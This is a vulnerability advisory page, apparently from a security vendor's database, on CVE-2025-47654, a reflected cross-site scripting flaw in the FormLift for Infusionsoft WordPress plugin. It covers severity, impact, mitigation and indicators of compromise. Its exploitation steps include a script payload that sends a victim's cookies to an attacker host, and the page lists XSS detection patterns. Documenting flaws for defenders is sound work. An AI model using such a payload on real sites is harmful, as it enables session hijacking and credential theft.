CVE-2025-47654
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-47654 is a Reflected Cross-Site Scripting (XSS) vulnerability in the FormLift for Infusionsoft Web Forms WordPress plugin, developed by Adrian Tobey. The flaw affects all versions from n/a through 7.5.20 and was published on June 27, 2025, with the assigning authority being Patchstack. It carries a CVSS v3.1 base score of 7.1 (High) (Feedly, Patchstack).

Technical details

The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and manifests as a Reflected XSS flaw, meaning malicious script is injected via a crafted URL or request parameter and immediately reflected back in the server's HTTP response without proper sanitization or encoding (Feedly). No authentication is required to craft the malicious request, but user interaction (e.g., a victim clicking a crafted link) is necessary for the payload to execute in the victim's browser. The attack vector is network-based with low attack complexity, and the scope is changed — meaning the impact extends beyond the vulnerable component itself (Feedly).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session token theft, credential harvesting, redirection to malicious sites, or defacement of page content as rendered to the victim. The CVSS scope change indicates that the impact can extend to other components or users beyond the directly vulnerable plugin, affecting confidentiality, integrity, and availability at a low level each (Feedly).

Exploitability

No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-47654 as of the available data. The EPSS score is approximately 0.00032, indicating a very low probability of exploitation in the near term (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the FormLift for Infusionsoft Web Forms plugin at version 7.5.20 or earlier using tools like WPScan or by inspecting plugin directories exposed via the target site.
  2. Identify vulnerable parameter: Locate the input parameter(s) within the plugin's form-handling functionality that are reflected in the HTTP response without sanitization (e.g., URL query parameters passed to form rendering endpoints).
  3. Craft malicious URL: Construct a URL targeting the vulnerable parameter with a JavaScript payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, URL-encoded as appropriate.
  4. Deliver to victim: Send the crafted URL to a target user (e.g., a site administrator or authenticated user) via phishing email, social engineering, or embedded link.
  5. Payload execution: When the victim clicks the link and loads the page, the reflected script executes in their browser, enabling session hijacking, credential theft, or further malicious actions (Feedly).

Indicators of compromise

  • Network: HTTP requests to WordPress pages hosting FormLift forms containing URL-encoded script tags or JavaScript event handlers (e.g., %3Cscript%3E, onerror=, onload=) in query parameters.
  • Logs: Web server access logs showing GET/POST requests to FormLift plugin endpoints with anomalous or encoded payloads in parameter values; repeated requests from the same IP with varying XSS payloads (fuzzing behavior).
  • Browser/Client-Side: Unexpected redirects or pop-ups reported by users when accessing pages with FormLift forms; outbound requests from victim browsers to unknown external domains shortly after visiting a FormLift-enabled page.

Mitigation and workarounds

Site administrators should update the FormLift for Infusionsoft Web Forms plugin to a version beyond 7.5.20 as soon as a patched release is available from the plugin vendor (Patchstack). As an interim measure, consider disabling the plugin if it is not critical to site operations, or implement a Web Application Firewall (WAF) rule to block requests containing script injection patterns targeting FormLift endpoints. Ensure WordPress and all other plugins are kept up to date to reduce overall attack surface.

Community reactions

The vulnerability was noted in the Wordfence Intelligence Weekly WordPress Vulnerability Report for the week of June 16–22, 2025, and was included in the CISA Vulnerability Summary Bulletin for the week of June 23, 2025 (Wordfence, CISA Bulletin). No significant independent researcher commentary or social media discussion has been identified beyond standard vulnerability aggregation coverage.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-14444HIGH7.5
  • wp-fusion
NoYesSep 07, 2026
CVE-2026-6431HIGH7.2
  • profile-builder
NoYesSep 07, 2026
CVE-2026-12757MEDIUM6.5
  • email-subscribers
NoYesSep 07, 2026
CVE-2026-8279MEDIUM5.3
  • learning-management-system
NoYesSep 07, 2026
CVE-2026-4945MEDIUM5.3
  • otter-blocks
NoYesSep 07, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management